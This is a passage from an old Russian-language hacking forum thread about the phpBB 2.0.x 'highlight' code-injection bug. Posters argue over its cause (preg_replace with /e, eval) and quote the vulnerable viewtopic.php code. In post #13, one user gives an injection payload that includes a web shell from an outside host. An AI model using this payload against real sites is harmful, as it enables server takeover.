ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.01.2006, 03:13
Dark Angel
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме:
299584

Репутация: 4
Отправить сообщение для Dark Angel с помощью ICQ Отправить сообщение для Dark Angel с помощью MSN
По умолчанию

dron-anarchy ты про чо???
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть

Последний раз редактировалось Dark Angel; 08.01.2006 в 03:43..
 
Ответить с цитированием

  #12  
Старый 09.01.2006, 08:51
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Цитата:
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть
Дык..вроде рабочий. а ты не пытался его запустиить?=))))
 
Ответить с цитированием

Бу
  #13  
Старый 10.01.2006, 20:54
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию Бу

вот ребята а что вы будете делать если на php safe mode, и нельзя команды выполнять? вот чтоб подобных траблов не было, проще сразу проинклудить вебшел. Так как видно что бага представляет собой php injection, делаем типа так:
Цитата:
....&highlight=%2527.include(\$_GET[qqq]).%2527&qqq=http://blablabla.narod.ru/shell.php?
 
Ответить с цитированием

  #14  
Старый 11.01.2006, 00:46
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
Так как видно что бага представляет собой php injection, делаем типа так:
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
 
Ответить с цитированием

  #15  
Старый 11.01.2006, 00:56
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

Цитата:
Сообщение от qBiN  
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
 
Ответить с цитированием

  #16  
Старый 11.01.2006, 01:03
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

а я ниче непонял=))) qBiN да если у него и так команды выполняются то нах скуль ему тем более как mysql позволит выполнить пхп команды??=)) и во-вторых бага там в хреновом использовании eval() =)))
 
Ответить с цитированием

  #17  
Старый 11.01.2006, 01:24
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

Цитата:
Сообщение от ZaCo  
и во-вторых бага там в хреновом использовании eval() =)))
вот сейчас специально для вас двоих- zaco и qbin, потрудился нашел старую версию phpbb , и вот представляю вам на обозрение тот самый уязвимый код из файла viewtopic.php:

PHP код:
$highlight_match $highlight '';
if (isset(
$HTTP_GET_VARS['highlight']))
{
    
// Split words and phrases
    
$words explode(' 'trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

    for(
$i 0$i sizeof($words); $i++)
    {
        if (
trim($words[$i]) != '')
        {
            
$highlight_match .= (($highlight_match != '') ? '|' '') . str_replace('*''\w*'$words[$i]);
        }
    }
    unset(
$words);

    
$highlight urlencode($HTTP_GET_VARS['highlight']);


PHP код:
if ($highlight_match)
    {
        
// This was shamelessly 'borrowed' from volker at multiartstudio dot de
        // via php.net's annotated manual
        
$message str_replace('\"''"'substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se'"preg_replace('#\b(" $highlight_match ")\b#i', '<span style=\"color:#" $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')"'>' $message '<'), 1, -1));
    } 
теперьто вы мне поверите?

Последний раз редактировалось ShAnKaR; 11.01.2006 в 01:38..
 
Ответить с цитированием

  #18  
Старый 11.01.2006, 01:35
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

нене ты думаешь как код выполняется? прег репласе - первая ошибка... а там уже в eval выполняется, ну эт конечно правильно если бы регулярные выражения грамматно настроили то все было бы безопасно+)))... просто имхо eval вообще опасная штука=)
 
Ответить с цитированием

  #19  
Старый 11.01.2006, 01:59
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

Цитата:
Сообщение от ZaCo  
нене ты думаешь как код выполняется?
я не думаю , я знаю- preg_replace с модификатором e
 
Ответить с цитированием

  #20  
Старый 11.01.2006, 11:08
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
Просто я подумал о том что используется двойное кодирование апострофа-%2527 :-)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6 vega2k Форумы 12 11.01.2009 15:57
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ